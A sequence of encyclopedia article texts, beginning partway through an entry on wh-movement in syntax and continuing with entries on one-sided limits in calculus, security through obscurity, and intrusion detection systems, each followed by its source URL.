'John bought meat.'
¿Qué
what
compró
bought
Juan?
John
¿Quécompró Juan?
what bought John
'What did John buy?'
The following examples illustrate wh-movement of an object inGerman:
Er
He
liest
reads
Tesnière
Tesnière
jeden
every
Abend.
evening.
Er liestTesnièrejeden Abend.
He reads Tesnière every evening.
'He reads Tesnière every evening.'
Wen
who
liest
reads
er
he
jeden
every
Abend?
evening
Wenliest er jeden Abend?
who reads he every evening
'Who does he read every evening?'
The following examples illustrate wh-movement of an object inFrench:
Ils
they
ont
have
vu
seen
Pierre.
Peter
Ils ont vu Pierre.
they have seen Peter
'They saw Peter.'
Qui
Who
est-ce qu'
is it that
ils
they
ont
have
vu?
seen
Qui {est-ce qu'} ils ont vu?
Who {is it that} they have seen
'Who did they see?'
Qui
Who
ont
have
ils
they
vu?
seen
Qui ont ils vu?
Who have they seen
'Who did they see?'
All the examples are quite similar to the English examples and demonstrate that wh-movement is a general phenomenon in numerous languages. As stated, however, the behaviour of wh-movement can vary, depending on the individual language in question.
German does not show the expected effects of the superiority condition during clauses with multiple wh-phrases. German appears to have a process that allows the farther wh-phrase to "cross over" the closer wh-phrase and move, not remaining in-situ.[25]This movement is tolerated and has less consequences than when compared with English.[25]
For example, see the following German phrases:
Ich
I
weiß
know
nicht,
not,
wer
who
was
what
gesehen
seen
hat
has
Ich weiß nicht, wer was gesehen hat
I know not, who what seen has
"I do not know who saw what"
Ich
I
weiß
know
nicht,
not,
was
what
wer
who
gesehen
seen
hat
has
Ich weiß nicht, was wer gesehen hat
I know not, what who seen has
"I do not know what who has seen"
In a., the gloss shows that the wh-phrase [what] has "crossed over" wh-phrase [who] and is now in Spec-CP to satisfy the [+Q Wh] feature. This movement is a violation of the attract closest principle, which is what the superiority condition is based upon.
Mandarinis a wh-in-situlanguage, which means that it does not exhibit wh-movement inconstituentquestions.[26]In other words, wh-words in Mandarin remain in their original position in their clause, contrasting with wh-movement inEnglishwhere the wh-word would move in constituent questions.
The following example illustrates multiple wh-movement in Mandarin:
你
nǐ
You
想
xiǎng
want
知道
zhīdǎo
know
瑪麗
Mǎlì
Mary
為什麼
wèishénme
why
買了
mǎile
buy-PAST
什麼
shénme
what
你 想 知道 瑪麗 為什麼 買了 什麼
nǐ xiǎng zhīdǎo Mǎlì wèishénme mǎile shénme
You want know Mary why buy-PAST what
'What do you wonder why Mary bought it?'
This example demonstrates that the wh-word "what" in Mandarin remains in-situ atSurface structure,[27]while the wh-word "why" in Mandarin moves to proper scope position and, in doing so,c-commandsthe wh-word that stays in-situ.
The scope of wh-questions in Mandarin is also subject to other conditions depending on the kind of wh-phrase involved.[28]The following example can translate into two meanings:
你
nǐ
You
想
xiǎng
want
知道
zhīdǎo
know
誰
shéi
who
買了
mǎile
buy-PAST
什麼
shénme
what
你 想 知道 誰 買了 什麼
nǐ xiǎng zhīdǎo shéi mǎile shénme
You want know who buy-PAST what
'What is the thing x such that you wonder who bought x?''Who is the person x such that you wonder what x bought?'
This example illustrates the way certain wh-words such as "who" and "what" can freely obtain matrix scope in Mandarin.[29]
In reference to theAttract Closestprinciple, where the head adopts the closest candidate available to it, the overt wh-phrase in Mandarin moves to proper scope position while the other wh-phrase stays in-situ as it is c-commanded by the wh-phrase first mentioned.[30]This can be seen in the following example, where the word for "what" stays in-situ since it is c-commanded by the phrase in Mandarin meaning "at where":
你
nǐ
You
想
xiǎng
want
知道
zhīdǎo
know
瑪麗
Mǎlì
Mary
在
zài
at
哪裡
nǎlǐ
where
買了
mǎile
buy-PAST
什麼
shénme
what
你 想 知道 瑪麗 在 哪裡 買了 什麼
nǐ xiǎng zhīdǎo Mǎlì zài nǎlǐ mǎile shénme
You want know Mary at where buy-PAST what
'What is the thing x such that you wonder where Mary bought x?''Where is the place x such that you wonder what Mary bought at x?'
As these examples show, Mandarin is a wh-in-situ language, exhibits no movement of wh-phrases at Surface structure, is subject to other conditions based on the type of wh-phrase involved in the question, and adheres to the Attract Closest principle.
lnBulgarian, the [+ wh] feature of C motivates multiple wh-word movements, which leads to multiple specifiers. It requires formation of clusters of wh-phrases in [Spec-CP] in the matrix clause. This is different fromEnglishbecause in English, only one wh-word moves to [Spec-CP] when there are multiple wh-words in a clause. This is because, in Bulgarian, unlike English, all movements of wh-elements take place in the syntax, where movement is shown overtly.[31]The phrase structure for wh-words in Bulgarian would look like is shown inFigure 1below, where a wh-cluster is formed under [Spec-CP].
In Bulgarian and Romanian, a wh-element is attracted into [Spec-CP] and the other wh-elements are adjoined into the first wh-word in [Spec-CP].[32]
Koj
Who
kogo
whom
___t1
vižda
sees
___t2?
Koj kogo ___t1vižda ___t2?
Who whom {} sees {}
Who sees whom?
In Example 1, we see that both the wh-words underwent movement and are in a [Spec-CP] cluster.
TheAttract Closestis a principle of the Superiority Condition where the head which attracts a certain feature adopts the closest candidate available to it. This usually leads to the movement of the closest candidate.
Slavic languages are grouped into two differentS-structuresconcerning the movement of wh-elements at [Spec-CP] (Rudin, 1998). One group includes the languagesSerbo-Croatian,Polish, andCzechwhere there is only one wh-element in [Spec-CP] at S-structure. The other group containsBulgarian, which has all of its wh-elements in [Spec-CP] at S-structure. In the first group mentioned, theAttract Closestprinciple is present, and the wh-word that is closest to the attracting head undergoes movement while the rest of the wh-elements remain in-situ.The second group of languages, theAttract Closestprinciple occurs in a slightly different way. The order of the way the wh-word moves is dictated by their proximity to [Spec-CP]. The closest wh-word to the attracting head undergoes movement first and the next closest one follows suit, and on and on. In that way, the Superiority effect is present in Serbo-Croatian, Polish, and Czech in the first wh-element, while, in Bulgarian, it is present in all of the wh-elements in the clause.[33]
Kakvo
What
kak
how
napravi
did
Ivan?
Ivan?
Kakvo kak napravi Ivan?
What how did Ivan?
How did Ivan what?
TheAttract Closestprinciple explains a crucial detail about which wh-words move first in the tree. Since the closest wh-word is moved first, there is a particular order that appears. Wh-subjects go before wh-objects and wh-adjuncts (Grewendorf, 2001). This is seen in Example #2 and Example #3. Example #3 also shows that there can be more than two wh-words in [Spec-CP] and that, no matter how many wh-words are in the clause, they would all have to undergo movement.
Koj
Who
kak
how
kogo
whom
e
is
celunal?
kissed
Koj kak kogo e celunal?
Who how whom is kissed
Who kissed whom how?
In Bulgarian, we see in Example #4 that to defer from forming a sequence of the same wh-words, a wh-element is allowed to remainin-situas a last resort (Bošković, 2002).
Kakvo
What
obuslavja
conditions
kakvo?
what
Kakvo obuslavja kakvo?
What conditions what
What conditions what?
In summary, Bulgarian has multiple wh-movement in the syntax and the wh-words move overtly. We also see that while all wh-words in a clause move under [Spec-CP] because of the [+ wh] feature, there is still a certain order in how they appear in the clause.
In French, multiple wh-questions have the following patterns:
a) In some French interrogative sentences,wh-movement can be optional.[34]
1.The closest wh-phrase to Spec-CP can be fronted (i.e., moved to Spec-CP from its covert base position in deep structure to its overt phonological form in surface-structure word order);
2.Alternatively, wh-phrases can remain in-situ.[34][35]
Qu'
what
as-
have
tu
you
envoyé
sent
à
to
qui?
whom
Qu' as- tu envoyé à qui?
what have you sent to whom
Tu
you
as
have
envoyé
sent
quoi
what
à
to
qui?
whom
Tu as envoyé quoi à qui?
you have sent what to whom
'What have you sent to who(m)?'
In the example sentences above, examples #1 and #2 are both grammatical and share the same meaning in French. Here, the choice of using one form of question over the other is optional; either sentence can be used to ask about the two particular DP constituents expressed by two wh-words.[34]In French, the second sentence could also be used as anecho question.[36]By contrast, in English, the grammatical structure of the second sentence is only acceptable as anecho question: a question we ask to clarify the information we hear (or mishear) in someone's utterance, or that we use to express our shock or disbelief in reaction to a statement made by someone.[25]For echo questions in English, it is typical for speakers to emphasize the wh-words prosodically by using rising intonation (e.g.,You sent WHAT to WHO?). These special instances of using multiple wh-questions in English are essentially "requests for the repetition of that utterance".[25]
b) In other French interrogative sentences,wh-movement is required.[35]
The option of using wh-in-situ in French sentences with multiple wh-questions is limited to specific conditions. There exists "a very limited distribution" of its usage.[35]
French wh-in-situ can occur only:
Wh-in-situ usage is not allowed in French when these criteria are not met.[35]
Many languages do not have wh-movement. Instead, these languages keep the symmetry of the question and answer sentences.
For example, topicquestions in Chinesehave the same sentence structure as their answers:
你
nǐ
you
在
zài
PROG
做
zuò
do
什麼?
shénme
what
[你在做什么?]
你 在 做什麼?
nǐ zài zuòshénme
you PROG dowhat
Whatare you doing?
The response to which could be:
我
wǒ
I
在
zài
PROG
編輯
biānjí
edit
維基百科。
Wéi jī bǎi kē
Wikipedia
[你在做编辑维基百科。]
我 在編輯維基百科。
wǒ zàibiānjí{Wéi jī bǎi kē}
I PROGeditWikipedia
I amediting Wikipedia.
Chinese has a wh-particle, no wh-movement.
Wh-movement typically results in adiscontinuity: the "moved" constituent ends up in a position that is separated from its canonical position by material that syntactically dominates the canonical position, which means there seems to be adiscontinuous constituentand along distance dependencypresent. Such discontinuities challenge any theory of syntax, and any theory of syntax is going to have a component that can address these discontinuities. In this regard, theories of syntax tend to explain discontinuities in one of two ways, either viamovementor viafeature passing. The EPP feature (extended projection principle) and Question Feature play a large role in the movement itself. We have noticed that these two features occur in ex-situ questions which allow movement and do not exist in in-situ questions that do allow it.
Theories that posit movement have a long and established tradition that reaches back to early Generative Grammar (1960s and 1970s). They assume that the displaced constituent (e.g., the wh-expression) is first generated in its canonical position at some level or point in the structure generating process below the surface. This expression is then moved or copied out of this base position and placed in its surface position where it actually appears in speech.[37]Movement is indicated in tree structures using one of a variety of means (e.g., a tracet, movement arrows, strikeouts, lighter font shade, etc.).
The alternative to the movement approach to wh-movement and discontinuities in general is feature passing. This approach rejects the notion that movement in any sense has occurred. The wh-expression is base generated in its surface position, and instead of movement, information passing (i.e., feature passing) occurs up or down the syntactic hierarchy to and from the position of the gap.
|
https://en.wikipedia.org/wiki/Wh-movement
|
Incalculus, aone-sided limitrefers to either one of the twolimitsof afunctionf(x){\displaystyle f(x)}of arealvariablex{\displaystyle x}asx{\displaystyle x}approaches a specified point either from the left or from the right.[1][2]
The limit asx{\displaystyle x}decreases in value approachinga{\displaystyle a}(x{\displaystyle x}approachesa{\displaystyle a}"from the right"[3]or "from above") can be denoted:[1][2]
limx→a+f(x)orlimx↓af(x)orlimx↘af(x)orf(x+){\displaystyle \lim _{x\to a^{+}}f(x)\quad {\text{ or }}\quad \lim _{x\,\downarrow \,a}\,f(x)\quad {\text{ or }}\quad \lim _{x\searrow a}\,f(x)\quad {\text{ or }}\quad f(x+)}
The limit asx{\displaystyle x}increases in value approachinga{\displaystyle a}(x{\displaystyle x}approachesa{\displaystyle a}"from the left"[4][5]or "from below") can be denoted:[1][2]
limx→a−f(x)orlimx↑af(x)orlimx↗af(x)orf(x−){\displaystyle \lim _{x\to a^{-}}f(x)\quad {\text{ or }}\quad \lim _{x\,\uparrow \,a}\,f(x)\quad {\text{ or }}\quad \lim _{x\nearrow a}\,f(x)\quad {\text{ or }}\quad f(x-)}
If the limit off(x){\displaystyle f(x)}asx{\displaystyle x}approachesa{\displaystyle a}exists then the limits from the left and from the right both exist and are equal. In some cases in which the limitlimx→af(x){\displaystyle \lim _{x\to a}f(x)}does not exist, the two one-sided limits nonetheless exist. Consequently, the limit asx{\displaystyle x}approachesa{\displaystyle a}is sometimes called a "two-sided limit".[citation needed]
It is possible for exactly one of the two one-sided limits to exist (while the other does not exist). It is also possible for neither of the two one-sided limits to exist.
IfI{\displaystyle I}represents someintervalthat is contained in thedomainoff{\displaystyle f}and ifa{\displaystyle a}is a point inI{\displaystyle I}then the right-sided limit asx{\displaystyle x}approachesa{\displaystyle a}can be rigorously defined as the valueR{\displaystyle R}that satisfies:[6][verification needed]for allε>0there exists someδ>0such that for allx∈I,if0<x−a<δthen|f(x)−R|<ε,{\displaystyle {\text{for all }}\varepsilon >0\;{\text{ there exists some }}\delta >0\;{\text{ such that for all }}x\in I,{\text{ if }}\;0<x-a<\delta {\text{ then }}|f(x)-R|<\varepsilon ,}and the left-sided limit asx{\displaystyle x}approachesa{\displaystyle a}can be rigorously defined as the valueL{\displaystyle L}that satisfies:for allε>0there exists someδ>0such that for allx∈I,if0<a−x<δthen|f(x)−L|<ε.{\displaystyle {\text{for all }}\varepsilon >0\;{\text{ there exists some }}\delta >0\;{\text{ such that for all }}x\in I,{\text{ if }}\;0<a-x<\delta {\text{ then }}|f(x)-L|<\varepsilon .}
We can represent the same thing more symbolically, as follows.
LetI{\displaystyle I}represent an interval, whereI⊆domain(f){\displaystyle I\subseteq \mathrm {domain} (f)}, anda∈I{\displaystyle a\in I}.
In comparison to the formal definition for thelimit of a functionat a point, the one-sided limit (as the name would suggest) only deals with input values to one side of the approached input value.
For reference, the formal definition for the limit of a function at a point is as follows:
To define a one-sided limit, we must modify this inequality. Note that the absolute distance betweenx{\displaystyle x}anda{\displaystyle a}is
|x−a|=|(−1)(−x+a)|=|(−1)(a−x)|=|(−1)||a−x|=|a−x|.{\displaystyle |x-a|=|(-1)(-x+a)|=|(-1)(a-x)|=|(-1)||a-x|=|a-x|.}
For the limit from the right, we wantx{\displaystyle x}to be to the right ofa{\displaystyle a}, which means thata<x{\displaystyle a<x}, sox−a{\displaystyle x-a}is positive. From above,x−a{\displaystyle x-a}is the distance betweenx{\displaystyle x}anda{\displaystyle a}. We want to bound this distance by our value ofδ{\displaystyle \delta }, giving the inequalityx−a<δ{\displaystyle x-a<\delta }. Putting together the inequalities0<x−a{\displaystyle 0<x-a}andx−a<δ{\displaystyle x-a<\delta }and using thetransitivityproperty of inequalities, we have the compound inequality0<x−a<δ{\displaystyle 0<x-a<\delta }.
Similarly, for the limit from the left, we wantx{\displaystyle x}to be to the left ofa{\displaystyle a}, which means thatx<a{\displaystyle x<a}. In this case, it isa−x{\displaystyle a-x}that is positive and represents the distance betweenx{\displaystyle x}anda{\displaystyle a}. Again, we want to bound this distance by our value ofδ{\displaystyle \delta }, leading to the compound inequality0<a−x<δ{\displaystyle 0<a-x<\delta }.
Now, when our value ofx{\displaystyle x}is in its desired interval, we expect that the value off(x){\displaystyle f(x)}is also within its desired interval. The distance betweenf(x){\displaystyle f(x)}andL{\displaystyle L}, the limiting value of the left sided limit, is|f(x)−L|{\displaystyle |f(x)-L|}. Similarly, the distance betweenf(x){\displaystyle f(x)}andR{\displaystyle R}, the limiting value of the right sided limit, is|f(x)−R|{\displaystyle |f(x)-R|}. In both cases, we want to bound this distance byε{\displaystyle \varepsilon }, so we get the following:|f(x)−L|<ε{\displaystyle |f(x)-L|<\varepsilon }for the left sided limit, and|f(x)−R|<ε{\displaystyle |f(x)-R|<\varepsilon }for the right sided limit.
Example 1:
The limits from the left and from the right ofg(x):=−1x{\displaystyle g(x):=-{\frac {1}{x}}}asx{\displaystyle x}approachesa:=0{\displaystyle a:=0}arelimx→0−−1/x=+∞andlimx→0+−1/x=−∞{\displaystyle \lim _{x\to 0^{-}}{-1/x}=+\infty \qquad {\text{ and }}\qquad \lim _{x\to 0^{+}}{-1/x}=-\infty }The reason whylimx→0−−1/x=+∞{\displaystyle \lim _{x\to 0^{-}}{-1/x}=+\infty }is becausex{\displaystyle x}is always negative (sincex→0−{\displaystyle x\to 0^{-}}means thatx→0{\displaystyle x\to 0}with all values ofx{\displaystyle x}satisfyingx<0{\displaystyle x<0}), which implies that−1/x{\displaystyle -1/x}is always positive so thatlimx→0−−1/x{\displaystyle \lim _{x\to 0^{-}}{-1/x}}diverges[note 1]to+∞{\displaystyle +\infty }(and not to−∞{\displaystyle -\infty }) asx{\displaystyle x}approaches0{\displaystyle 0}from the left.
Similarly,limx→0+−1/x=−∞{\displaystyle \lim _{x\to 0^{+}}{-1/x}=-\infty }since all values ofx{\displaystyle x}satisfyx>0{\displaystyle x>0}(said differently,x{\displaystyle x}is always positive) asx{\displaystyle x}approaches0{\displaystyle 0}from the right, which implies that−1/x{\displaystyle -1/x}is always negative so thatlimx→0+−1/x{\displaystyle \lim _{x\to 0^{+}}{-1/x}}diverges to−∞.{\displaystyle -\infty .}
Example 2:
One example of a function with different one-sided limits isf(x)=11+2−1/x,{\displaystyle f(x)={\frac {1}{1+2^{-1/x}}},}(cf. picture) where the limit from the left islimx→0−f(x)=0{\displaystyle \lim _{x\to 0^{-}}f(x)=0}and the limit from the right islimx→0+f(x)=1.{\displaystyle \lim _{x\to 0^{+}}f(x)=1.}To calculate these limits, first show thatlimx→0−2−1/x=∞andlimx→0+2−1/x=0{\displaystyle \lim _{x\to 0^{-}}2^{-1/x}=\infty \qquad {\text{ and }}\qquad \lim _{x\to 0^{+}}2^{-1/x}=0}(which is true becauselimx→0−−1/x=+∞andlimx→0+−1/x=−∞{\displaystyle \lim _{x\to 0^{-}}{-1/x}=+\infty {\text{ and }}\lim _{x\to 0^{+}}{-1/x}=-\infty })
so that consequently,limx→0+11+2−1/x=11+limx→0+2−1/x=11+0=1{\displaystyle \lim _{x\to 0^{+}}{\frac {1}{1+2^{-1/x}}}={\frac {1}{1+\displaystyle \lim _{x\to 0^{+}}2^{-1/x}}}={\frac {1}{1+0}}=1}whereaslimx→0−11+2−1/x=0{\displaystyle \lim _{x\to 0^{-}}{\frac {1}{1+2^{-1/x}}}=0}because the denominator diverges to infinity; that is, becauselimx→0−1+2−1/x=∞.{\displaystyle \lim _{x\to 0^{-}}1+2^{-1/x}=\infty .}Sincelimx→0−f(x)≠limx→0+f(x),{\displaystyle \lim _{x\to 0^{-}}f(x)\neq \lim _{x\to 0^{+}}f(x),}the limitlimx→0f(x){\displaystyle \lim _{x\to 0}f(x)}does not exist.
The one-sided limit to a pointp{\displaystyle p}corresponds to thegeneral definition of limit, with the domain of the function restricted to one side, by either allowing that the function domain is a subset of the topological space, or by considering a one-sided subspace, includingp.{\displaystyle p.}[1][verification needed]Alternatively, one may consider the domain with ahalf-open interval topology.[citation needed]
A noteworthy theorem treating one-sided limits of certainpower seriesat the boundaries of theirintervals of convergenceisAbel's theorem.[citation needed]
|
https://en.wikipedia.org/wiki/One-sided_limit
|
Insecurity engineering,security through obscurityis the practice of concealing the details or mechanisms of a system to enhance its security. This approach relies on the principle ofhiding something in plain sight, akin to a magician'ssleight of handor the use ofcamouflage. It diverges from traditional security methods, such as physical locks, and is more about obscuring information or characteristics to deter potential threats. Examples of this practice include disguising sensitive information within commonplace items, like a piece of paper in a book, or altering digital footprints, such asspoofing a web browser's version number. While not a standalone solution, security through obscurity can complement othersecurity measuresin certain scenarios.[1]
Obscurity in the context of security engineering is the notion that information can be protected, to a certain extent, when it is difficult to access or comprehend. This concept hinges on the principle of making the details or workings of a system less visible or understandable, thereby reducing the likelihood of unauthorized access or manipulation.[2]
Security by obscurity alone is discouraged and not recommended by standards bodies.
An early opponent of security through obscurity was the locksmithAlfred Charles Hobbs, who in 1851 demonstrated to the public how state-of-the-art locks could be picked. In response to concerns that exposing security flaws in the design of locks could make them more vulnerable to criminals, he said: "Rogues are very keen in their profession, and know already much more than we can teach them."[3]
There is scant formal literature on the issue of security through obscurity. Books onsecurity engineeringciteKerckhoffs' doctrinefrom 1883 if they cite anything at all. For example, in a discussion about secrecy and openness innuclear command and control:
[T]he benefits of reducing the likelihood of an accidental war were considered to outweigh the possible benefits of secrecy. This is a modern reincarnation of Kerckhoffs' doctrine, first put forward in the nineteenth century, that the security of a system should depend on its key, not on its design remaining obscure.[4]
Peter Swirehas written about the trade-off between the notion that "security through obscurity is an illusion" and the military notion that "loose lips sink ships",[5]as well as on how competition affects the incentives to disclose.[6][further explanation needed]
There are conflicting stories about the origin of this term. Fans ofMIT'sIncompatible Timesharing System(ITS) say it was coined in opposition toMulticsusers down the hall, for whom security was far more an issue than on ITS. Within the ITS culture, the term referred, self-mockingly, to the poor coverage of the documentation and obscurity of many commands, and to the attitude that by the time a tourist figured out how to make trouble he'd generally got over the urge to make it, because he felt part of the community. One instance of deliberate security through obscurity on ITS has been noted: the command to allow patching the running ITS system (altmode altmode control-R) echoed as$$^D. Typing Alt Alt Control-D set a flag that would prevent patching the system even if the user later got it right.[7]
In January 2020,NPRreported thatDemocratic Party officials in Iowadeclined to share information regarding the security ofits caucus app, to "make sure we are not relaying information that could be used against us." Cybersecurity experts replied that "to withhold the technical details of its app doesn't do much to protect the system."[8]
Security by obscurity alone is discouraged and not recommended by standards bodies. TheNational Institute of Standards and Technology(NIST) in theUnited Statesrecommends against this practice: "System security should not depend on the secrecy of the implementation or its components."[9]TheCommon Weakness Enumerationproject lists "Reliance on Security Through Obscurity" as CWE-656.[10]
A large number of telecommunication anddigital rights managementcryptosystems use security through obscurity, but have ultimately been broken. These include components ofGSM,GMRencryption,GPRSencryption, a number of RFID encryption schemes, and most recentlyTerrestrial Trunked Radio(TETRA).[11]
One of the largest proponents of security through obscurity commonly seen today is anti-malware software. What typically occurs with thissingle point of failure, however, is anarms raceof attackers finding novel ways to avoid detection and defenders coming up with increasingly contrived but secret signatures to flag on.[12]
The technique stands in contrast withsecurity by designandopen security, although many real-world projects include elements of all strategies.
Knowledge of how the system is built differs from concealment andcamouflage. The effectiveness of obscurity inoperations securitydepends on whether the obscurity lives on top of other good security practices, or if it is being used alone.[13]When used as an independent layer, obscurity is considered a valid security tool.[14]
In recent years, more advanced versions of "security through obscurity" have gained support as a methodology incybersecuritythrough Moving Target Defense andcyber deception.[15]NIST's cyber resiliency framework, 800-160 Volume 2, recommends the usage of security through obscurity as a complementary part of a resilient and secure computing environment.[16]
|
https://en.wikipedia.org/wiki/Security_through_obscurity
|
Anintrusion detection system(IDS) is a device orsoftwareapplication that monitors a network or systems for malicious activity or policy violations.[1]Any intrusion activity or violation is typically either reported to an administrator or collected centrally using asecurity information and event management (SIEM)system. A SIEM system combines outputs from multiple sources and usesalarm filteringtechniques to distinguish malicious activity fromfalse alarms.[2]
IDS types range in scope from single computers to large networks.[3]The most common classifications arenetwork intrusion detection systems(NIDS) andhost-based intrusion detection systems(HIDS). A system that monitors important operating system files is an example of an HIDS, while a system that analyzes incoming network traffic is an example of an NIDS. It is also possible to classify IDS by detection approach. The most well-known variants aresignature-based detection(recognizing bad patterns, such asexploitation attempts) and anomaly-based detection (detecting deviations from a model of "good" traffic, which often relies onmachine learning). Another common variant is reputation-based detection (recognizing the potential threat according to the reputation scores). Some IDS products have the ability to respond to detected intrusions. Systems with response capabilities are typically referred to as anintrusion prevention system(IPS).[4]Intrusion detection systems can also serve specific purposes by augmenting them with custom tools, such as using a honeypot to attract and characterize malicious traffic.[5]
Although they both relate tonetwork security, an IDS differs from afirewallin that a conventional network firewall (distinct from anext-generation firewall) uses a static set of rules to permit or deny network connections. It implicitly prevents intrusions, assuming an appropriate set of rules have been defined. Essentially, firewalls limit access between networks to prevent intrusion and do not signal an attack from inside the network. An IDS describes a suspected intrusion once it has taken place and signals an alarm. An IDS also watches for attacks that originate from within a system. This is traditionally achieved by examining network communications, identifyingheuristicsand patterns (often known as signatures) of common computer attacks, and taking action to alert operators. A system that terminates connections is called an intrusion prevention system, and performs access control like anapplication layer firewall.[6]
IDS can be classified by where detection takes place (network orhost) or the detection method that is employed (signature or anomaly-based).[7]
Network intrusion detection systems (NIDS) are placed at a strategic point or points within the network to monitor traffic to and from all devices on the network.[8]It performs an analysis of passing traffic on the entiresubnet, and matches the traffic that is passed on the subnets to the library of known attacks. Once an attack is identified, or abnormal behavior is sensed, the alert can be sent to the administrator. NIDS function to safeguard every device and the entire network from unauthorized access.[9]
An example of an NIDS would be installing it on the subnet where firewalls are located in order to see if someone is trying to break into the firewall. Ideally one would scan all inbound and outbound traffic, however doing so might create a bottleneck that would impair the overall speed of the network.OPNETand NetSim are commonly used tools for simulating network intrusion detection systems. NID Systems are also capable of comparing signatures for similar packets to link and drop harmful detected packets which have a signature matching the records in the NIDS. When we classify the design of the NIDS according to the system interactivity property, there are two types: on-line and off-line NIDS, often referred to as inline and tap mode, respectively. On-line NIDS deals with the network in real time. It analyses theEthernet packetsand applies some rules, to decide if it is an attack or not. Off-line NIDS deals with stored data and passes it through some processes to decide if it is an attack or not.
NIDS can be also combined with other technologies to increase detection and prediction rates.Artificial Neural Network(ANN) based IDS are capable of analyzing huge volumes of data due to the hidden layers and non-linear modeling, however this process requires time due its complex structure.[10]This allows IDS to more efficiently recognize intrusion patterns.[11]Neural networks assist IDS in predicting attacks by learning from mistakes; ANN based IDS help develop an early warning system, based on two layers. The first layer accepts single values, while the second layer takes the first's layers output as input; the cycle repeats and allows the system to automatically recognize new unforeseen patterns in the network.[12]This system can average 99.9% detection and classification rate, based on research results of 24 network attacks, divided in four categories: DOS, Probe, Remote-to-Local, and user-to-root.[13]
Host intrusion detection systems (HIDS) run on individual hosts or devices on the network. A HIDS monitors the inbound and outbound packets from the device only and will alert the user or administrator if suspicious activity is detected. It takes a snapshot of existing system files and matches it to the previous snapshot. If the critical system files were modified or deleted, an alert is sent to the administrator to investigate. An example of HIDS usage can be seen on mission critical machines, which are not expected to change their configurations.[14][15]
Signature-based IDS is the detection of attacks by looking for specific patterns, such as byte sequences in network traffic, or known malicious instruction sequences used by malware.[16]This terminology originates fromanti-virus software, which refers to these detected patterns as signatures. Although signature-based IDS can easily detect known attacks, it is difficult to detect new attacks, for which no pattern is available.[17]
In signature-based IDS, the signatures are released by a vendor for all its products. On-time updating of the IDS with the signature is a key aspect.
Anomaly-based intrusion detection systemswere primarily introduced to detect unknown attacks, in part due to the rapid development of malware. The basic approach is to use machine learning to create a model of trustworthy activity, and then compare new behavior against this model. Since these models can be trained according to the applications and hardware configurations, machine learning based method has a better generalized property in comparison to traditional signature-based IDS. Although this approach enables the detection of previously unknown attacks, it may suffer fromfalse positives: previously unknown legitimate activity may also be classified as malicious. Most of the existing IDSs suffer from the time-consuming during detection process that degrades the performance of IDSs. Efficientfeature selectionalgorithm makes the classification process used in detection more reliable.[18]
New types of what could be called anomaly-based intrusion detection systems are being viewed byGartneras User and Entity Behavior Analytics (UEBA)[19](an evolution of theuser behavior analyticscategory) and networktraffic analysis(NTA).[20]In particular, NTA deals with malicious insiders as well as targeted external attacks that have compromised a user machine or account. Gartner has noted that some organizations have opted for NTA over more traditional IDS.[21]
Some systems may attempt to stop an intrusion attempt but this is neither required nor expected of a monitoring system. Intrusion detection and prevention systems (IDPS) are primarily focused on identifying possible incidents, logging information about them, and reporting attempts. In addition, organizations use IDPS for other purposes, such as identifying problems with security policies, documenting existing threats and deterring individuals from violating security policies. IDPS have become a necessary addition to the security infrastructure of nearly every organization.[22]
IDPS typically record information related to observed events, notify security administrators of important observed events and produce reports. Many IDPS can also respond to a detected threat by attempting to prevent it from succeeding. They use several response techniques, which involve the IDPS stopping the attack itself, changing the security environment (e.g. reconfiguring a firewall) or changing the attack's content.[22]
Intrusion prevention systems(IPS), also known asintrusion detection and prevention systems(IDPS), arenetwork securityappliances that monitor network or system activities for malicious activity. The main functions of intrusion prevention systems are to identify malicious activity, log information about this activity, report it and attempt to block or stop it.[23].
Intrusion prevention systems are considered extensions of intrusion detection systems because they both monitor network traffic and/or system activities for malicious activity. The main differences are, unlike intrusion detection systems, intrusion prevention systems are placed in-line and are able to actively prevent or block intrusions that are detected.[24]: 273[25]: 289IPS can take such actions as sending an alarm, dropping detected malicious packets, resetting a connection or blocking traffic from the offending IP address.[26]An IPS also can correctcyclic redundancy check(CRC)errors, defragment packet streams, mitigate TCP sequencing issues, and clean up unwantedtransportandnetwork layeroptions.[24]: 278[27]
Intrusion prevention systems can be classified into four different types:[23][28]
The majority of intrusion prevention systems utilize one of three detection methods: signature-based, statistical anomaly-based, and stateful protocol analysis.[25]: 301[29]
The correct placement of intrusion detection systems is critical and varies depending on the network. The most common placement is behind the firewall, on the edge of a network. This practice provides the IDS with high visibility of traffic entering your network and will not receive any traffic between users on the network. The edge of the network is the point in which a network connects to the extranet. Another practice that can be accomplished if more resources are available is a strategy where a technician will place their first IDS at the point of highest visibility and depending on resource availability will place another at the next highest point, continuing that process until all points of the network are covered.[33]
If an IDS is placed beyond a network's firewall, its main purpose would be to defend against noise from the internet but, more importantly, defend against common attacks, such as port scans and network mapper. An IDS in this position would monitor layers 4 through 7 of the OSI model and would be signature-based. This is a very useful practice, because rather than showing actual breaches into the network that made it through the firewall, attempted breaches will be shown which reduces the amount of false positives. The IDS in this position also assists in decreasing the amount of time it takes to discover successful attacks against a network.[34]
Sometimes an IDS with more advanced features will be integrated with a firewall in order to be able to intercept sophisticated attacks entering the network. Examples of advanced features would include multiple security contexts in the routing level and bridging mode. All of this in turn potentially reduces cost and operational complexity.[34]
Another option for IDS placement is within the actual network. These will reveal attacks or suspicious activity within the network. Ignoring the security within a network can cause many problems, it will either allow users to bring about security risks or allow an attacker who has already broken into the network to roam around freely. Intense intranet security makes it difficult for even those hackers within the network to maneuver around and escalate their privileges.[34]
There are a number of techniques which attackers are using, the following are considered 'simple' measures which can be taken to evade IDS:
The earliest preliminary IDS concept was delineated in 1980 by James Anderson at theNational Security Agencyand consisted of a set of tools intended to help administrators review audit trails.[38]User access logs, file access logs, and system event logs are examples of audit trails.
Fred Cohennoted in 1987 that it is impossible to detect an intrusion in every case, and that the resources needed to detect intrusions grow with the amount of usage.[39]
Dorothy E. Denning, assisted byPeter G. Neumann, published a model of an IDS in 1986 that formed the basis for many systems today.[40]Her model used statistics foranomaly detection, and resulted in an early IDS atSRI Internationalnamed the Intrusion Detection Expert System (IDES), which ran onSunworkstations and could consider both user and network level data.[41]IDES had a dual approach with a rule-basedExpert Systemto detect known types of intrusions plus a statistical anomaly detection component based on profiles of users, host systems, and target systems. The author of "IDES: An Intelligent System for Detecting Intruders", Teresa F. Lunt, proposed adding anartificial neural networkas a third component. She said all three components could then report to a resolver. SRI followed IDES in 1993 with the Next-generation Intrusion Detection Expert System (NIDES).[42]
TheMulticsintrusion detection and alerting system (MIDAS), an expert system using P-BEST andLisp, was developed in 1988 based on the work of Denning and Neumann.[43]Haystack was also developed in that year using statistics to reduce audit trails.[44]
